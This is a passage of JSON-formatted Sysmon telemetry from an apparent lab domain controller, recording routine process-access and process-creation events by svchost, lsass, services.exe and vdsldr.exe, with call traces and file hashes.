\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1256,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.449\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.449","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1257,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.460\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001072BF0200}\r\nTargetProcessId: 2460\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.460","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001072BF0200}","TargetProcessId":"2460","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1258,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.460\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001072BF0200}\r\nTargetProcessId: 2460\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.460","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001072BF0200}","TargetProcessId":"2460","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1259,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.473\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1056-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.473","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1056-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1260,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.473\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1056-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.473","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1056-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1261,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.495\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 2632\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001072BF0200}\r\nTargetProcessId: 2460\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.495","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"2632","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001072BF0200}","TargetProcessId":"2460","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1262,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.495\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-00108AEF0200}\r\nProcessId: 3448\r\nImage: C:\\Windows\\System32\\vdsldr.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Virtual Disk Service Loader\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: vdsldr.exe\r\nCommandLine: C:\\Windows\\System32\\vdsldr.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=E5C3B321907C73E782280BE427599F14,SHA256=43F0AF018DC498619222CF16E1C9BDE2F7710732686DC361E4D692B7EFB4DDF9,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9\r\nParentProcessGuid: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nParentProcessId: 596\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.495","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-00108AEF0200}","Image":"C:\\Windows\\System32\\vdsldr.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Virtual Disk Service Loader","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"vdsldr.exe","CommandLine":"C:\\Windows\\System32\\vdsldr.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=E5C3B321907C73E782280BE427599F14,SHA256=43F0AF018DC498619222CF16E1C9BDE2F7710732686DC361E4D692B7EFB4DDF9,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9","ParentProcessGuid":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","ParentProcessId":"596","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1263,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-00108AEF0200}\r\nTargetProcessId: 3448\r\nTargetImage: C:\\Windows\\System32\\vdsldr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-00108AEF0200}","TargetProcessId":"3448","TargetImage":"C:\\Windows\\System32\\vdsldr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 